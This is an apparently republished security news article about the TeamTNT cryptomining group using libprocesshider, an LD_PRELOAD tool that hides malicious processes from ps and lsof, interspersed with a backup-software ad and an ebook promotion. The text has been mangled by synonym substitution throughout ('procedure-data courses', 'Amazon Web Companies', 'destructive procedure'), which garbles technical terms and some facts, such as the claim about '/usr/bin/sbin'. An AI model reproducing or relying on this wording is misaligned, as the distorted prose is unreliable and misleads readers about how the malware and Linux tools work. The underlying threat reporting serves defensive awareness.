The detection-evasion device, libprocesshider, hides TeamTNT’s malware from procedure-data courses.
The TeamTNT threat team has extra a new detection-evasion instrument to its arsenal, assisting its cryptomining malware skirt by defense groups.
The TeamTNT cybercrime group is regarded for cloud-primarily based attacks, like focusing on Amazon Web Companies (AWS) credentials in purchase to split into the cloud and use it to mine for the Monero cryptocurrency. It has also formerly focused Docker and Kubernetes cloud instances.
Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.
Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).
➤ Activate Your Coupon Code
The new detection-evasion tool, libprocesshider, is copied from open-resource repositories. The open up-resource device, from 2014 has been found on Github, and is described as obtaining abilities to “hide a system less than Linux making use of the ld preloader.”
“While the new performance of libprocesshider is to evade detection and other essential functions, it acts as an indicator to take into consideration when looking for destructive exercise on the host level,” said scientists with AT&T’s Alien Labs, on Wednesday.
The new device is delivered within just a base64-encoded script, concealed in the TeamTNT cryptominer binary, or through its Internet Relay Chat (IRC) bot, identified as TNTbotinger, which is able of distributed denial of support (DDoS) attacks.
In the attack chain, after the base64-encoded script is downloaded, it operates by way of multiple jobs. These contain modifying the network DNS configuration, placing persistence (via systemd), downloading the most current IRC bot configuration, clearing proof of activities – and dropping and activating libprocesshider. The device is dropped as a concealed Tape Archive file (also recognized as the Tar format, which is utilised for open up-source software package distribution) on the disk and then decompressed by the script and created to ‘/usr/local/lib/systemhealt.so’.
libprocesshider then aims to hides the destructive procedure from approach facts plans this sort of as `ps’ and `lsof.’
These are equally system-viewer resources, which use the file ‘/usr/bin/sbin. The ‘ps’ system (limited for “process status”) shows now running processes in numerous Unix-like functioning programs meanwhile, ‘lsof’ is a command (short for “list open up files”), also utilized in Unix-like working devices to, as the title suggests, report a list of all open data files and the procedures that opened them. Hiding the procedure from these two course of action-viewer instruments would permit the attacker to cloak its malicious activity.
libprocesshider employs a process known as preloading in order to cover its action from ‘ps’ and ‘lsof.’ This method allows the procedure to load a custom shared library prior to other system libraries are loaded.
“If the tailor made shared library exports a functionality with the identical signature of one found in the procedure libraries, the tailor made edition will override it,” mentioned researchers.
The uploaded customized shared library then will allow the tool to implement the purpose readdir(). This perform is utilized by processes like `ps’ to read the /proc listing to find operating procedures. It makes use of this perform to modify the return value, in case ‘ps’ obtain the malicious process, in get to conceal it.
TeamTNT Carries on to Incorporate New Features
From time to time, TeamTNT has been observed deploying many updates to its cryptomining malware, such as a new memory loader uncovered just a couple of weeks in the past, which was based on Ezuri and written in GOlang.
In August, TeamTNT’s cryptomining worm was uncovered spreading by way of the AWS cloud and gathering qualifications. Then, following a hiatus, the TeamTNT team returned in September to attack Docker and Kubernetes cloud situations by abusing a authentic cloud-monitoring resource identified as Weave Scope.
Obtain our distinctive Free of charge Threatpost Insider Ebook Healthcare Security Woes Balloon in a Covid-Era Environment, sponsored by ZeroNorth, to find out additional about what these security hazards necessarily mean for hospitals at the working day-to-day stage and how health care security teams can implement ideal techniques to safeguard suppliers and individuals. Get the total story and Down load the E-book now – on us!
Some pieces of this article are sourced from:
threatpost.com